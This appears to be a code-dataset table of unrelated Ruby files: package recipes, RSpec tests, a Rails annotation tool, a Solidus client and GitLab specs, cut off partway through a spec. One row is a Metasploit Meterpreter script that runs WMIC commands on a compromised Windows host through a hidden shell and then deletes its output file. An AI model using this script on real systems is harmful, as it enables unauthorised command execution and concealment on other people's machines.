hexsha stringlengths 40 40 | size int64 2 1.01M | content stringlengths 2 1.01M | avg_line_length float64 1.5 100 | max_line_length int64 2 1k | alphanum_fraction float64 0.25 1 |
---|---|---|---|---|---|
79590b144214135b18b1b8a1bdd6f3788cb8d911 | 1,002 | class AtlassianCli < Formula
desc "Command-line interface clients for Atlassian products"
homepage "https://bobswift.atlassian.net/wiki/pages/viewpage.action?pageId=1966101"
url "https://bobswift.atlassian.net/wiki/download/attachments/16285777/atlassian-cli-9.1.0-distribution.zip"
sha256 "60c01f984a75b4e4071eca8f968cdacccf0bde469a9b21fc3abd66206346c2a1"
livecheck do
url "https://marketplace.atlassian.com/apps/10886/atlassian-command-line-interface-cli/version-history"
regex(/class="version">v?(\d+(?:\.\d+)+)</i)
end
bottle :unneeded
depends_on "openjdk"
def install
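# Point the acli.sh wrapper at the installed jar and at Homebrew's openjdk java binary.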
inreplace "acli.sh" do |s|
s.sub! "`find \"$directory/lib\" -name acli-*.jar`", "'#{share}/lib/acli-#{version}.jar'"
s.sub! "java", "'#{Formula["openjdk"].opt_bin}/java'"
end
bin.install "acli.sh" => "acli"
share.install "lib", "license"
end
test do
assert_match "Welcome to the Bob Swift Atlassian CLI", shell_output("#{bin}/acli --help 2>&1 | head")
end
end
| 34.551724 | 110 | 0.700599 |
919e2c2f1408a503ee9f16e6411e0c6c5cbcafac | 1,533 | #
# Copyright 2013-2014 Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Install bzip2 and its shared library, libbz2.so
# This library object is required for building Python with the bz2 module,
# and should be picked up automatically when building Python.
name "bzip2"
default_version "1.0.6"
dependency "zlib"
dependency "openssl"
source url: "http://www.bzip.org/#{version}/#{name}-#{version}.tar.gz",
md5: "00b516f4704d4a7cb50a1d97e6e8e15b"
relative_path "#{name}-#{version}"
build do
env = with_standard_compiler_flags(with_embedded_path)
# Avoid warning where .rodata cannot be used when making a shared object
env["CFLAGS"] << " -fPIC"
# The list of arguments to pass to make
args = "PREFIX='#{install_dir}/embedded' VERSION='#{version}'"
patch source: 'makefile_take_env_vars.patch'
patch source: 'soname_install_dir.patch' if mac_os_x? # Patched line, see
make "#{args}", env: env
make "#{args} -f Makefile-libbz2_so", env: env
make "#{args} install", env: env
end
| 32.617021 | 76 | 0.734508 |
288a274598c063c91654171d315e58474aed2ef1 | 308 | require 'rubygems'
require 'simplecov'
SimpleCov.start do
add_filter "/spec/"
end
require 'rspec'
require 'rspec/its'
Dir[File.expand_path(File.join(File.dirname(__FILE__),'support','**','*.rb'))].each {|f| require f}
require 'conjur/api'
require 'conjur-asset-aws'
require 'conjur-asset-host-factory'
| 19.25 | 99 | 0.727273 |
0342dc2c56f3e29c4003e89fe72b88bfd54dd158 | 7,193 | module Aam
class Annotation
MAGIC_COMMENT_LINE = "# -*- coding: utf-8 -*-\n"
attr_accessor :counts, :options
def self.run(options = {})
new(options).run
end
def initialize(options = {})
@options = {
:root_dir => Rails.root,
:dry_run => false,
:skip_columns => [], # %w(id created_at updated_at),
:models => ENV["MODEL"].presence || ENV["MODELS"].presence,
}.merge(options)
@counts = Hash.new(0)
STDOUT.sync = true
end
def run
schema_info_text_write
puts
model_file_write_all
end
def model_file_write_all
target_ar_klasses_from_model_filenames.each do |klass|
begin
model = Model.new(self, klass)
model.write_to_relation_files
rescue ActiveRecord::ActiveRecordError => error
if @options[:debug]
puts "--------------------------------------------------------------------------------"
p error
puts "--------------------------------------------------------------------------------"
end
@counts[:error] += 1
end
end
puts
puts "#{@counts[:success]} success, #{@counts[:skip]} skip, #{@counts[:error]} errors"
end
def schema_info_text_write
@all = []
target_ar_klasses_from_model_require_and_ar_subclasses.each do |klass|
begin
model = Model.new(self, klass)
@all << model.schema_info
rescue ActiveRecord::ActiveRecordError => error
end
end
file = root_dir.join("db", "schema_info.txt")
magic_comment = "-*- truncate-lines: t -*-"
file.write("#{magic_comment}\n\n#{@all.join}")
puts "output: #{file} (#{@all.size} counts)"
end
def root_dir
@root_dir ||= Pathname(@options[:root_dir].to_s).expand_path
end
private
class Model
def initialize(base, klass)
@base = base
@klass = klass
end
def schema_info
@schema_info ||= Generator.new(@klass, @base.options).generate + "\n"
end
def write_to_relation_files
puts ""
puts "--> #{@klass}"
target_files = search_paths.collect {|search_path|
v = Pathname.glob((@base.root_dir + search_path).expand_path)
v.reject{|e|e.to_s.include?("node_modules")}
}.flatten.uniq
target_files.each {|e| annotate_write(e) }
end
private
# TODO: Too dependent on this app's directory structure?
def search_paths
paths = []
paths << "app/models/**/#{@klass.name.underscore}.rb"
# paths << "app/models/**/#{@klass.name.underscore}_{search,observer,callback,sweeper}.rb"
paths << "test/unit/**/#{@klass.name.underscore}_test.rb"
paths << "test/fixtures/**/#{@klass.name.underscore.pluralize}.yml"
paths << "test/unit/helpers/**/#{@klass.name.underscore}_helper_test.rb"
paths << "spec/models/**/#{@klass.name.underscore}_spec.rb"
paths << "{test,spec}/**/#{@klass.name.underscore}_factory.rb"
[:pluralize, :singularize].each{|method|
prefix = @klass.name.underscore.send(method)
[
"app/controllers/**/#{prefix}_controller.rb",
"app/helpers/**/#{prefix}_helper.rb",
"test/functional/**/#{prefix}_controller_test.rb",
"test/factories/**/#{prefix}_factory.rb",
"test/factories/**/#{prefix}.rb",
"db/seeds/**/{[0-9]*_,}#{prefix}_setup.rb",
"db/seeds/**/{[0-9]*_,}#{prefix}_seed.rb",
"db/seeds/**/{[0-9]*_,}#{prefix}.rb",
"db/migrate/*_{create,to,from}_#{prefix}.rb",
"spec/**/#{prefix}_{controller,helper}_spec.rb",
].each{|path|
paths << path
}
}
paths
end
def annotate_write(file_name)
body = file_name.read
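# Match an existing schema block: the SCHEMA_HEADER line (assumed to be defined elsewhere in this gem), any comment lines after it, and the trailing blank lines.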
regexp = /^#{SCHEMA_HEADER}\n(#.*\n)*\n+/
if body.match(regexp)
body = body.sub(regexp, schema_info)
elsif body.include?(MAGIC_COMMENT_LINE)
body = body.sub(/#{Regexp.escape(MAGIC_COMMENT_LINE)}\s*/) {MAGIC_COMMENT_LINE + schema_info}
else
body = body.sub(/^\s*/, schema_info)
end
body = insert_magick_comment(body)
unless @base.options[:dry_run]
file_name.write(body)
end
puts "write: #{file_name}"
@base.counts[:success] += 1
end
def insert_magick_comment(body, force = false)
if force
body = body.sub(/#{Regexp.escape(MAGIC_COMMENT_LINE)}\s*/, "")
end
unless body.include?(MAGIC_COMMENT_LINE)
body = body.sub(/^\s*/, MAGIC_COMMENT_LINE)
end
body
end
end
#
# Classes that have database tables
#
def target_ar_klasses
target_ar_klasses_from_model_require_and_ar_subclasses
# ActiveRecord::Base.subclasses
end
# Require every app/models/**/*.rb, then look at ActiveRecord::Base.subclasses
def target_ar_klasses_from_model_require_and_ar_subclasses
target_model_files.each do |file|
begin
silence_warnings do
require file
end
puts "require: #{file}"
rescue Exception
end
end
if defined?(ApplicationRecord)
ApplicationRecord.subclasses
else
ActiveRecord::Base.subclasses
end
end
# Collect classes by trying to constantize the filenames under app/models/*
def target_ar_klasses_from_model_filenames
models = []
target_model_files.each do |file|
file = file.expand_path
klass = nil
md = file.to_s.match(/\A.*\/app\/models\/(.*)\.rb\z/)
underscore_class_name = md.captures.first
class_name = underscore_class_name.camelize # classify would turn "boss" into "bos"
begin
klass = class_name.constantize
rescue LoadError => error # LoadError cannot be caught by a bare `rescue nil`
puts "No file corresponding to #{class_name} was found: #{error}"
rescue
end
# Without the klass.class == Class check, [] < ActiveRecord::Base raises an error
if klass && klass.class == Class && klass < ActiveRecord::Base && !klass.abstract_class?
# puts "#{file} is a subclass of ActiveRecord::Base, so it is included."
puts "model: #{file}"
models << klass
else
# puts "#{file} (class name: #{class_name}) was not a subclass of ActiveRecord::Base."
end
end
models
end
#
# Target model files
#
def target_model_files
files = []
files += Pathname.glob("#{root_dir}/app/models/**/*.rb")
files += Pathname.glob("#{root_dir}/vendor/plugins/*/app/models/**/*.rb")
if @options[:models]
@options[:models].split(",").collect { |m|
files.find_all { |e|
e.basename(".*").to_s.match(/#{m.camelize}|#{m.underscore}/i)
}
}.flatten.uniq
else
files
end
end
end
end
if $0 == __FILE__
require "active_record"
require "rails"
require "table_format"
obj = Aam::Annotation.new(root_dir: "~/src/shogi_web")
tp obj.send(:target_model_files)
tp obj.send(:target_ar_klasses_from_model_filenames)
end
| 31.138528 | 103 | 0.565133 |
39d8a987eadec44bca6ccad8741e95cff0cbe88d | 330 | class Subethaedit < Cask
url 'http://www.codingmonkeys.de/subethaedit/SubEthaEdit.zip'
appcast 'http://www.codingmonkeys.de/subethaedit/appcast.rss'
homepage 'http://www.codingmonkeys.de/subethaedit/'
version '3.5.4'
sha256 '72d3948e5da167ac3113ec8f56aa424965b0ec153df4ba8042ce5893a547e290'
link 'SubEthaEdit.app'
end
| 36.666667 | 75 | 0.793939 |
188f6cf6c4338a2c0c89fa9ce40bf02edcbce77d | 336 | # frozen_string_literal: false
module SensuPluginsMeta
# The version of this Sensu plugin.
module Version
# The major version.
MAJOR = 1
# The minor version.
MINOR = 0
# The patch version.
PATCH = 10
# Concat them into a version string
VER_STRING = [MAJOR, MINOR, PATCH].compact.join('.')
end
end
| 21 | 56 | 0.660714 |
6a2aeaabe978f45223975f904293488808e3c9c9 | 2,404 | require 'rails_helper'
RSpec.describe 'Participants::Devise::Sessions', type: :feature do
let(:user) { create(:client) }
describe 'reset password' do
context 'with valid email' do
it 'update password' do
visit new_client_password_path(user)
fill_in 'client_email', with: user.email
expect do
submit_form
end.to change(ActionMailer::Base.deliveries, :count).by(1)
token = user.send(:set_reset_password_token)
visit edit_client_password_url(reset_password_token: token)
fill_in 'client_password', with: 'Passw0rd!'
fill_in 'client_password_confirmation', with: 'Passw0rd!'
submit_form
expect(page).to have_current_path(participants_root_path)
expect(page).to have_flash(:info, text: devise_password_updated_msg)
end
it 'not update password with invalid data' do
token = user.send(:set_reset_password_token)
visit edit_client_password_url(reset_password_token: token)
fill_in 'client_password', with: ''
fill_in 'client_password_confirmation', with: '123'
submit_form
expect(page).to have_current_path(client_password_path)
expect(page).to have_flash(:danger, text: flash_errors_msg)
expect(page).to have_message(sf_blank_error_msg, in: 'div.client_password')
fill_in 'client_password', with: '12'
fill_in 'client_password_confirmation', with: '123'
submit_form
expect(page).to have_message(sf_minimum_pwd_length, in: 'div.client_password')
expect(page).to have_message(sf_confirmation_pwd_error_msg,
in: 'div.client_password_confirmation')
end
it 'not update password with invalid token' do
visit edit_client_password_url(reset_password_token: 'aaa')
submit_form
expect(page).to have_message(sf_invalid_error_msg, in: 'div.client_reset_password_token')
end
end
context 'with invalid email' do
it 'not send email' do
visit new_client_password_path(user)
fill_in 'client_email', with: '[email protected]'
submit_form
expect(page).to have_current_path(client_password_path)
expect(page).to have_flash(:danger, text: flash_errors_msg)
expect(page).to have_message(sf_not_found_msg, in: 'div.client_email')
end
end
end
end
| 34.84058 | 97 | 0.682196 |
bb6196782d067aa944264d9cdf7299278fa71cf0 | 1,002 | require_relative 'boot'
require 'rails'
require 'active_model/railtie'
require 'active_job/railtie'
require 'active_record/railtie'
require 'action_controller/railtie'
require 'action_mailer/railtie'
require 'action_view/railtie'
require 'sprockets/railtie'
require 'rails/test_unit/railtie'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module SalesUp
# Application is responsible to setup some rails configurations related to
# the application
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
config.autoload_paths += %W[#{config.root}/lib]
# Settings in config/environments/* take precedence over those
# specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 31.3125 | 79 | 0.772455 |
28b3658a681f006467c64acaa143cb4918fa8c96 | 1,485 | # -*- encoding: utf-8 -*-
# stub: jekyll-mentions 1.4.1 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-mentions".freeze
s.version = "1.4.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["GitHub, Inc.".freeze]
s.date = "2018-08-08"
s.email = "[email protected]".freeze
s.homepage = "https://github.com/jekyll/jekyll-mentions".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.1.4".freeze
s.summary = "@mention support for your Jekyll site".freeze
s.installed_by_version = "3.1.4" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<html-pipeline>.freeze, ["~> 2.3"])
s.add_runtime_dependency(%q<jekyll>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<rake>.freeze, ["~> 12.0"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<rubocop>.freeze, ["~> 0.57.2"])
else
s.add_dependency(%q<html-pipeline>.freeze, ["~> 2.3"])
s.add_dependency(%q<jekyll>.freeze, ["~> 3.0"])
s.add_dependency(%q<rake>.freeze, ["~> 12.0"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_dependency(%q<rubocop>.freeze, ["~> 0.57.2"])
end
end
| 38.076923 | 112 | 0.670034 |
6a3fbea7d10ace58c6167f11287c38577f3bae5b | 626 | def solution(n, p, q)
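# Smallest-prime-factor sieve: primes[j] becomes the smallest prime factor of composite j, and stays 0 when j is prime.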
primes = Array.new(n + 1, 0)
2.upto(Math.sqrt(n)) do |i|
next if primes[i] > 0
(i + i..n).step(i) do |j|
next if primes[j] > 0
primes[j] = i
end
end
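# Count prime factors with multiplicity: divide by the smallest prime factor until a prime remains, then add one for it. semiprimes[i] == 2 means i is a semiprime.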
semiprimes = Array.new(n + 1, 0)
2.upto(n) do |i|
x = i
while primes[x] > 0
x = x / primes[x]
semiprimes[i] += 1
end
semiprimes[i] += 1 if i > 1
end
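# prefix_sums[i + 1] holds the number of semiprimes <= i (4 is the smallest semiprime).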
prefix_sums = Array.new(n + 2, 0)
4.upto(n) do |i|
prefix_sums[i + 1] = prefix_sums[i]
prefix_sums[i + 1] += 1 if semiprimes[i] == 2
end
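# Answer each query: the number of semiprimes in the inclusive range p[i]..q[i].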
0.upto(p.size - 1).map do |i|
prefix_sums[q[i] + 1] - prefix_sums[p[i]]
end
end
| 20.193548 | 49 | 0.520767 |
915f84ceacdf6722f9e88d9d279481d72dc4a271 | 1,024 | # frozen_string_literal: true
require 'pry'
require 'bundler/setup'
require 'k_fileset'
# require 'k_usecases'
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
config.filter_run_when_matching :focus
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
# # ----------------------------------------------------------------------
# # Usecase Documentor
# # ----------------------------------------------------------------------
# KUsecases.configure(config)
# config.extend KUsecases
# config.before(:context, :usecases) do
# puts '-' * 70
# puts self.class
# puts '-' * 70
# @documentor = KUsecases::Documentor.new(self.class)
# end
# config.after(:context, :usecases) do
# @documentor.render
# puts '-' * 70
# puts self.class
# puts '-' * 70
# end
end
| 24.380952 | 76 | 0.580078 |
1d86daff0be2dfea10e90a85b8351b40b15df65b | 1,058 | # frozen_string_literal: true
module SolidusShipstation
module Api
class Client
class << self
def from_config
new(
request_runner: RequestRunner.from_config,
error_handler: SolidusShipstation.config.error_handler,
shipment_serializer: SolidusShipstation.config.api_shipment_serializer,
)
end
end
attr_reader :request_runner, :error_handler, :shipment_serializer
def initialize(request_runner:, error_handler:, shipment_serializer:)
@request_runner = request_runner
@error_handler = error_handler
@shipment_serializer = shipment_serializer
end
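# Serialize each shipment for the bulk order creation endpoint; shipments that fail to serialize are reported to the error handler and skipped.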
def bulk_create_orders(shipments)
params = shipments.map do |shipment|
shipment_serializer.call(shipment)
rescue StandardError => e
error_handler.call(e, shipment: shipment)
nil
end.compact
return if params.empty?
request_runner.call(:post, '/orders/createorders', params)
end
end
end
end
| 27.128205 | 83 | 0.660681 |
4a10f8e981b290de09e9f936c6b717c1c1fd1d0d | 3,670 | # $Id$
#Meterpreter script for running WMIC commands on Windows XP, Windows Vista,
# Windows 2003 and Windows 2008 targets.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
#Version: 0.1
################## Variable Declarations ##################
session = client
wininfo = client.sys.config.sysinfo
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-c" => [ true,"Command to execute. The command must be enclosed in double quotes."],
"-f" => [ true,"File where to saved output of command."],
"-s" => [ true,"Text file with list of commands, one per line."]
)
#Setting Argument variables
commands = []
script = []
outfile = nil
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in an array, returns output as a string
def wmicexec(session,wmiccmds= nil)
windr = ''
tmpout = ''
windrtmp = ""
session.response_timeout=120
begin
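# wmic is run with /append: pointing at a random file under %TEMP%, and the output is read back from that file afterwards.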
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"
puts wmicfl
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finishes before executing the next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
print_line "."
found = 0
end
end
end
r.close
end
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
wmioutfile.close
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout
end
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each_line do |d|
output.puts(d)
end
output.close
end
def usage
print_line("Windows WMIC Command Execution Meterpreter Script ")
puts @@exec_opts.usage
print_line("USAGE:")
print_line("run wmic -c \"WMIC Command Argument\"\n")
print_line("NOTE:")
print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
print_line("Example:")
print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
end
################## Main ##################
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-c"
if !val
raise "-c requires an argument"
end
commands.concat(val.split("/"))
when "-s"
if !val
raise "-s requires an argument"
end
script = val
if not ::File.exists?(script)
raise "Command List File does not exists!"
else
::File.open(script, "r").each_line do |line|
commands << line.chomp
end
end
when "-f"
if !val
raise "-f requires an argument"
end
outfile = val
when "-h"
usage
raise RuntimeError, "Usage"
else
raise RuntimeError, "Unknown option: #{opt}"
end
if commands.empty?
usage
raise RuntimeError, "Empty command list"
end
}
if outfile == nil
print_status wmicexec(session,commands)
else
print_status("Saving output of WMIC to #{outfile}")
filewrt(outfile, wmicexec(session,commands))
end
| 28.230769 | 137 | 0.66376 |
ed4d0bccfc1589886cfa5906c20929d6c740dc7e | 175 | class HomeController < ApplicationController
skip_before_action :authenticate_user!, only: [:index]
def index
@photos = Photo.all
@user = current_user
end
end
| 19.444444 | 56 | 0.731429 |
bb848be6e92634e8a8dc68b3f702fda239d3d40e | 1,000 | # typed: true
class Mutations::Stores::DeleteStore < Mutations::BaseMutation
description "Delete a game store. **Only available to moderators and admins using a first-party OAuth Application.**"
argument :store_id, ID, required: true, description: 'The ID of the store to delete.'
field :deleted, Boolean, null: true, description: "Whether the store was successfully deleted."
sig { params(store_id: T.any(String, Integer)).returns(T::Hash[Symbol, T::Boolean]) }
def resolve(store_id:)
store = Store.find(store_id)
raise GraphQL::ExecutionError, store.errors.full_messages.join(", ") unless store.destroy
{
deleted: true
}
end
sig { params(object: T.untyped).returns(T::Boolean) }
def authorized?(object)
require_permissions!(:first_party)
store = Store.find(object[:store_id])
raise GraphQL::ExecutionError, "You aren't allowed to delete this store." unless StorePolicy.new(@context[:current_user], store).destroy?
return true
end
end
| 33.333333 | 141 | 0.719 |
61fbb4f8243a8dd48755351eac77fc99e3022871 | 291 | require 'gabba'
require 'rspec'
require 'webmock/rspec'
WebMock.disable_net_connect!
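# Stubs the Google Analytics __utm.gif request for the given account id (utmac); the rest of the query string is matched loosely.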
def stub_analytics(expected_params)
stub_request(
:get,
/www.google-analytics.com\/__utm.gif\?utmac=#{expected_params[:utmac]}&.*/
).to_return(:status => 200, :body => '', :headers => {})
end
| 22.384615 | 78 | 0.694158 |
1ac4f37834bc459930d7f83983de4afe57965755 | 4,508 | # frozen_string_literal: true
module EE
module API
module Helpers
module SettingsHelpers
extend ActiveSupport::Concern
prepended do
params :optional_params_ee do
optional :elasticsearch_aws, type: Grape::API::Boolean, desc: 'Enable support for AWS hosted elasticsearch'
given elasticsearch_aws: ->(val) { val } do
optional :elasticsearch_aws_access_key, type: String, desc: 'AWS IAM access key'
requires :elasticsearch_aws_region, type: String, desc: 'The AWS region the elasticsearch domain is configured'
optional :elasticsearch_aws_secret_access_key, type: String, desc: 'AWS IAM secret access key'
end
optional :elasticsearch_indexing, type: Grape::API::Boolean, desc: 'Enable Elasticsearch indexing'
given elasticsearch_indexing: ->(val) { val } do
optional :elasticsearch_search, type: Grape::API::Boolean, desc: 'Enable Elasticsearch search'
optional :elasticsearch_pause_indexing, type: Grape::API::Boolean, desc: 'Pause Elasticsearch indexing'
requires :elasticsearch_url, type: String, desc: 'The url to use for connecting to Elasticsearch. Use a comma-separated list to support clustering (e.g., "http://localhost:9200, http://localhost:9201")'
optional :elasticsearch_limit_indexing, type: Grape::API::Boolean, desc: 'Limit Elasticsearch to index certain namespaces and projects'
end
given elasticsearch_limit_indexing: ->(val) { val } do
optional :elasticsearch_namespace_ids, type: Array[Integer], coerce_with: ::API::Validations::Types::CommaSeparatedToIntegerArray.coerce, desc: 'The namespace ids to index with Elasticsearch.'
optional :elasticsearch_project_ids, type: Array[Integer], coerce_with: ::API::Validations::Types::CommaSeparatedToIntegerArray.coerce, desc: 'The project ids to index with Elasticsearch.'
end
optional :email_additional_text, type: String, desc: 'Additional text added to the bottom of every email for legal/auditing/compliance reasons'
optional :default_project_deletion_protection, type: Grape::API::Boolean, desc: 'Disable project owners ability to delete project'
optional :deletion_adjourned_period, type: Integer, desc: 'Number of days between marking project as deleted and actual removal'
optional :help_text, type: String, desc: 'GitLab server administrator information'
optional :repository_size_limit, type: Integer, desc: 'Size limit per repository (MB)'
optional :file_template_project_id, type: Integer, desc: 'ID of project where instance-level file templates are stored.'
optional :usage_ping_enabled, type: Grape::API::Boolean, desc: 'Every week GitLab will report license usage back to GitLab, Inc.'
optional :updating_name_disabled_for_users, type: Grape::API::Boolean, desc: 'Flag indicating if users are permitted to update their profile name'
optional :disable_overriding_approvers_per_merge_request, type: Grape::API::Boolean, desc: 'Disable Users ability to overwrite approvers in merge requests.'
optional :prevent_merge_requests_author_approval, type: Grape::API::Boolean, desc: 'Disable Merge request author ability to approve request.'
optional :prevent_merge_requests_committers_approval, type: Grape::API::Boolean, desc: 'Disable Merge request committer ability to approve request.'
optional :npm_package_requests_forwarding, type: Grape::API::Boolean, desc: 'NPM package requests are forwarded to npmjs.org if not found on GitLab.'
optional :group_owners_can_manage_default_branch_protection, type: Grape::API::Boolean, desc: 'Allow owners to manage default branch protection in groups'
optional :maintenance_mode, type: Grape::API::Boolean, desc: 'When instance is in maintenance mode, non-admin users can sign in with read-only access and make read-only API requests'
optional :maintenance_mode_message, type: String, desc: 'Message displayed when instance is in maintenance mode'
end
end
class_methods do
extend ::Gitlab::Utils::Override
override :optional_attributes
def optional_attributes
super + EE::ApplicationSettingsHelper.possible_licensed_attributes
end
end
end
end
end
end
| 71.555556 | 216 | 0.712733 |
e93a4e62244f33fbe1716ac00251ee8ee4cef1ad | 57,930 | require 'spec_helper'
describe Project, models: true do
describe 'associations' do
it { is_expected.to belong_to(:group) }
it { is_expected.to belong_to(:namespace) }
it { is_expected.to belong_to(:creator).class_name('User') }
it { is_expected.to have_many(:users) }
it { is_expected.to have_many(:services) }
it { is_expected.to have_many(:events).dependent(:destroy) }
it { is_expected.to have_many(:merge_requests).dependent(:destroy) }
it { is_expected.to have_many(:issues).dependent(:destroy) }
it { is_expected.to have_many(:milestones).dependent(:destroy) }
it { is_expected.to have_many(:project_members).dependent(:destroy) }
it { is_expected.to have_many(:users).through(:project_members) }
it { is_expected.to have_many(:requesters).dependent(:destroy) }
it { is_expected.to have_many(:notes).dependent(:destroy) }
it { is_expected.to have_many(:snippets).class_name('ProjectSnippet').dependent(:destroy) }
it { is_expected.to have_many(:deploy_keys_projects).dependent(:destroy) }
it { is_expected.to have_many(:deploy_keys) }
it { is_expected.to have_many(:hooks).dependent(:destroy) }
it { is_expected.to have_many(:protected_branches).dependent(:destroy) }
it { is_expected.to have_one(:forked_project_link).dependent(:destroy) }
it { is_expected.to have_one(:slack_service).dependent(:destroy) }
it { is_expected.to have_one(:mattermost_service).dependent(:destroy) }
it { is_expected.to have_one(:pushover_service).dependent(:destroy) }
it { is_expected.to have_one(:asana_service).dependent(:destroy) }
it { is_expected.to have_many(:boards).dependent(:destroy) }
it { is_expected.to have_one(:campfire_service).dependent(:destroy) }
it { is_expected.to have_one(:drone_ci_service).dependent(:destroy) }
it { is_expected.to have_one(:emails_on_push_service).dependent(:destroy) }
it { is_expected.to have_one(:builds_email_service).dependent(:destroy) }
it { is_expected.to have_one(:emails_on_push_service).dependent(:destroy) }
it { is_expected.to have_one(:irker_service).dependent(:destroy) }
it { is_expected.to have_one(:pivotaltracker_service).dependent(:destroy) }
it { is_expected.to have_one(:hipchat_service).dependent(:destroy) }
it { is_expected.to have_one(:flowdock_service).dependent(:destroy) }
it { is_expected.to have_one(:assembla_service).dependent(:destroy) }
it { is_expected.to have_one(:slack_slash_commands_service).dependent(:destroy) }
it { is_expected.to have_one(:mattermost_slash_commands_service).dependent(:destroy) }
it { is_expected.to have_one(:gemnasium_service).dependent(:destroy) }
it { is_expected.to have_one(:buildkite_service).dependent(:destroy) }
it { is_expected.to have_one(:bamboo_service).dependent(:destroy) }
it { is_expected.to have_one(:teamcity_service).dependent(:destroy) }
it { is_expected.to have_one(:jira_service).dependent(:destroy) }
it { is_expected.to have_one(:redmine_service).dependent(:destroy) }
it { is_expected.to have_one(:custom_issue_tracker_service).dependent(:destroy) }
it { is_expected.to have_one(:bugzilla_service).dependent(:destroy) }
it { is_expected.to have_one(:gitlab_issue_tracker_service).dependent(:destroy) }
it { is_expected.to have_one(:external_wiki_service).dependent(:destroy) }
it { is_expected.to have_one(:project_feature).dependent(:destroy) }
it { is_expected.to have_one(:statistics).class_name('ProjectStatistics').dependent(:delete) }
it { is_expected.to have_one(:import_data).class_name('ProjectImportData').dependent(:destroy) }
it { is_expected.to have_one(:last_event).class_name('Event') }
it { is_expected.to have_one(:forked_from_project).through(:forked_project_link) }
it { is_expected.to have_many(:commit_statuses) }
it { is_expected.to have_many(:pipelines) }
it { is_expected.to have_many(:builds) }
it { is_expected.to have_many(:runner_projects) }
it { is_expected.to have_many(:runners) }
it { is_expected.to have_many(:variables) }
it { is_expected.to have_many(:triggers) }
it { is_expected.to have_many(:labels).class_name('ProjectLabel').dependent(:destroy) }
it { is_expected.to have_many(:users_star_projects).dependent(:destroy) }
it { is_expected.to have_many(:environments).dependent(:destroy) }
it { is_expected.to have_many(:deployments).dependent(:destroy) }
it { is_expected.to have_many(:todos).dependent(:destroy) }
it { is_expected.to have_many(:releases).dependent(:destroy) }
it { is_expected.to have_many(:lfs_objects_projects).dependent(:destroy) }
it { is_expected.to have_many(:project_group_links).dependent(:destroy) }
it { is_expected.to have_many(:notification_settings).dependent(:destroy) }
it { is_expected.to have_many(:forks).through(:forked_project_links) }
context 'after initialized' do
it "has a project_feature" do
project = FactoryGirl.build(:project)
expect(project.project_feature.present?).to be_present
end
end
describe '#members & #requesters' do
let(:project) { create(:empty_project, :public, :access_requestable) }
let(:requester) { create(:user) }
let(:developer) { create(:user) }
before do
project.request_access(requester)
project.team << [developer, :developer]
end
describe '#members' do
it 'includes members and exclude requesters' do
member_user_ids = project.members.pluck(:user_id)
expect(member_user_ids).to include(developer.id)
expect(member_user_ids).not_to include(requester.id)
end
end
describe '#requesters' do
it 'does not include requesters' do
requester_user_ids = project.requesters.pluck(:user_id)
expect(requester_user_ids).to include(requester.id)
expect(requester_user_ids).not_to include(developer.id)
end
end
end
describe '#boards' do
it 'raises an error when attempting to add more than one board to the project' do
subject.boards.build
expect { subject.boards.build }.to raise_error(Project::BoardLimitExceeded, 'Number of permitted boards exceeded')
expect(subject.boards.size).to eq 1
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Gitlab::ConfigHelper) }
it { is_expected.to include_module(Gitlab::ShellAdapter) }
it { is_expected.to include_module(Gitlab::VisibilityLevel) }
it { is_expected.to include_module(Gitlab::CurrentSettings) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
end
describe 'validation' do
let!(:project) { create(:project) }
it { is_expected.to validate_presence_of(:name) }
